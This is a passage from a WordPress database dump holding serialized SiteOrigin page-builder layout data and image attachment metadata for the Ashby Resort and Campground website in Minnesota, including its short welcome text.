1;s:6:\"weight\";i:1;}}}'),(494,35,'panels_data','a:3:{s:7:\"widgets\";a:5:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;}i:3;a:6:{s:5:\"title\";s:58:\"Welcome to Ashby Resort and Campground in Ashby Minnesota.\";s:4:\"text\";s:149:\"<p style=\"text-align: center;\">We look forward to making this your favorite vacation spot.</p><p style=\"text-align: center;\">Mike and Diane Bovee</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cfac972b2\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:1;s:4:\"cell\";i:1;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"8446f2f4-f230-4207-8146-76cb1c82a7f9\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:4;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:242:\"<p style=\"text-align: center;\">Welcome to Ashby Resort and Campground in Ashby Minnesota.</p><p style=\"text-align: center;\">We look forward to making this your favorite vacation spot.</p><p style=\"text-align: center;\">Mike and Diane Bovee</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:2;s:4:\"cell\";i:0;s:2:\"id\";i:4;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:3:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:2;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:7:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:4;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:5;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:6;a:2:{s:4:\"grid\";i:2;s:6:\"weight\";i:1;}}}'),(495,216,'panels_data','a:3:{s:7:\"widgets\";a:5:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;}i:3;a:6:{s:5:\"title\";s:58:\"Welcome to Ashby Resort and Campground in Ashby Minnesota.\";s:4:\"text\";s:149:\"<p style=\"text-align: center;\">We look forward to making this your favorite vacation spot.</p><p style=\"text-align: center;\">Mike and Diane Bovee</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cfac972b2\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:1;s:4:\"cell\";i:1;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"8446f2f4-f230-4207-8146-76cb1c82a7f9\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:4;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:242:\"<p style=\"text-align: center;\">Welcome to Ashby Resort and Campground in Ashby Minnesota.</p><p style=\"text-align: center;\">We look forward to making this your favorite vacation spot.</p><p style=\"text-align: center;\">Mike and Diane Bovee</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:2;s:4:\"cell\";i:0;s:2:\"id\";i:4;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:3:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:2;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:7:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:4;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:5;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:6;a:2:{s:4:\"grid\";i:2;s:6:\"weight\";i:1;}}}'),(496,217,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:59:\"We look forward to making this your favorite vacation spot.\";s:4:\"text\";s:92:\"<p style=\"text-align: center;\"> </p><p style=\"text-align: center;\">Mike and Diane Bovee</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(497,35,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:153:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot. </h3><p style=\"text-align: center;\">Mike and Diane Bovee</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(498,218,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:153:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot. </h3><p style=\"text-align: center;\">Mike and Diane Bovee</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(499,219,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:164:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot. </h3><h5 style=\"text-align: center;\"><em>Mike and Diane Bovee</em></h5>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(500,220,'_wp_attached_file','2016/07/CLT-Brochure-Panel-Map-2.jpg'),(501,220,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1242;s:6:\"height\";i:810;s:4:\"file\";s:36:\"2016/07/CLT-Brochure-Panel-Map-2.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"CLT-Brochure-Panel-Map-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"CLT-Brochure-Panel-Map-2-300x196.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"CLT-Brochure-Panel-Map-2-768x501.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:501;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"CLT-Brochure-Panel-Map-2-1024x668.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:668;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:36:\"CLT-Brochure-Panel-Map-2-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:36:\"CLT-Brochure-Panel-Map-2-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:36:\"CLT-Brochure-Panel-Map-2-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:37:\"CLT-Brochure-Panel-Map-2-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:36:\"CLT-Brochure-Panel-Map-2-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:36:\"CLT-Brochure-Panel-Map-2-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:36:\"CLT-Brochure-Panel-Map-2-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:36:\"CLT-Brochure-Panel-Map-2-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1